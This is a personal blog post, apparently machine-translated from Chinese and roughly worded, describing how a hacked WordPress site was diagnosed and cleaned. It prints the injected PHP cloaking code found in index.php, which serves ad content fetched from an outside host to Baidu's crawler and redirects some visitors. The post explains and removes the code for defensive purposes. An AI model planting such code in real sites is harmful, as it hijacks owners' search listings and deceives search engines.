The website was hacked by a horse after being tampered with how I resolved the site was hung!

1, found to be black, the site was black symptoms

Two years ago, I used WordPress to build a website, usually nothing to write articles to play. But some days ago, suddenly found that the traffic suddenly small, site a bit Baidu included, found a big problem, the site was black. Most Baidu crawl included page title and description was tampered with, such as, title title was changed to XX friendship link, description description is some advertising URL. But after the point in, access to normal, the page is displayed normal, the page source code is normal, the slightest tamper traces. However, why Baidu Crawler will crawl to these ad text, where did these words come from?

2, I guess the reason, the page and Baidu crawl included display inconsistent. It is not feasible to check the server log scheme.

Website actual page and Baidu bug included display inconsistent, site source code must have been, but how to change, change where do not know, the server code file has hundreds of, one check, one line to see the source code is certainly not realistic. The first thought was to check the server logs. But the problem is not knowing which day the hacker changed, so only a few weeks to recall the server log to check. However, the inspection log is also a huge project, and the experience is not enough, but also very troublesome, or not necessarily results. Therefore, a new approach can only be sought.

3. Find the key route to solve the problem, use Useragent-watch

Page content has not changed, but Baidu Bug crawl wrong, the problem is definitely in the crawler crawl body. So if you can see the whole process of worm crawling, you might find the answer. After a study, found a tool "User-agent-switcher", can simulate a variety of devices and search engine bug, Chrome and Firefox browser have plug-ins can be installed. Chrome installed Useragent-watch, add Baidu crawler useragent settings: mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)..

Other search engine Useragent:http://hi.baidu.com/romicboy/item/afc8d8d217278d5bd63aae22

After setting up, switch to simulate the state of Baidu Crawler, again visit my site, this is true now, the site jumped to another site page, this page content is, my site in Baidu display of those advertising information, such as. Again useragent switch back, enter my website domain name, this visit all normal. This time we can conclude that the problem is on the useragent. Hacker certainly changed the source code of the site, but also in the source code to add a judgment statement, if the current request is the useragent is the search primer crawler, the worm into the ad page, if it is the other normal execution.

4. Find the modified source code

Although the cause of the problem was found, how to find the modified file? However, understand the WordPress source code file Execution sequence process, everything is very simple, such as, in order to find a file quickly can be found.

Log in to FTP, according to the file first found the index.php file, sure enough, good luck, the first file is modified. The hacker added code like this at the very beginning of the code.

If you're still being invaded by repeated tampering, it's advisable to find a professional to handle it safely.

5. Explain the meaning of this PHP code:

$file = "http://www.XXXX.com/XXXX/X.htm";

$referer =$_server["http_referer"];//URL

$agent = Strtolower ($_server["http_user_agent"]);//The contents of the current request are converted to lowercase

if (Strstr ($referer, "Baidu") &&strstr ($referer, "456")//if it is from Baidu Point to the page

{

Header ("Location: $url");//go to the original normal URL

}

if (Ereg ("http://www.baidu.com/search/spider.htm", $agent))//If it is Baidu bug

{

$content =file_get_contents ($file);//go to the URL page that you defined earlier

Echo $content;

Exit

}

By deleting this paragraph, it will be OK. Re-submit Baidu, let Baidu re-crawl, after a few days Baidu snapshot update is good.

The website was hacked by a horse after being tampered with how I resolved the site was hung!